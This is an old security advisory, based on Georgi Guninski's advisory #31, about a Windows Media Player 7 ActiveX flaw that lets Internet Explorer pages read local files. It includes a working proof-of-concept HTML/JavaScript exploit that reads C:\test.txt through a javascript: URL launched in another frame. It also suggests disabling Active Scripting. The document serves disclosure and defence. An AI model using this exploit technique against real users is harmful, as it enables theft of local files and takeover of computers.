COMMAND

    media

SYSTEMS AFFECTED

    Windows Media Player 7 and IE

PROBLEM

    Following is  based on  a Georgi  Guninski security  advisory #31.
    There  is  a  security  vulnerability  in  Windows  Media Player 7
    exploitable  thru  IE  which  allows  reading local files which in
    turn allows  executing arbitratrary  programs.   This may  lead to
    taking full control over user's computer.

    The  problem  is  the  WMP  ActiveX Control which allows launching
    javascript URLs  in arbitrary  already open  frames.   This allows
    taking over the frames's DOM.  Examine the code for more info.

    The code is:

        <object id="o1" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6">
        <PARAM NAME="defaultFrame" value="georgi">
        </object>
        <SCRIPT>
        alert("This page reads C:\\test.txt");
        window.open("file://c:/test.txt","georgi");
        function f()
        {
        document.o1.object.launchURL("javascript:alert(document.body.innerText)");
        }
        setTimeout("f()",1000);
        </SCRIPT>

    Demonstration is available at:

        http://www.guninski.com/wmp7ie.html

SOLUTION

    Disable Active Scripting.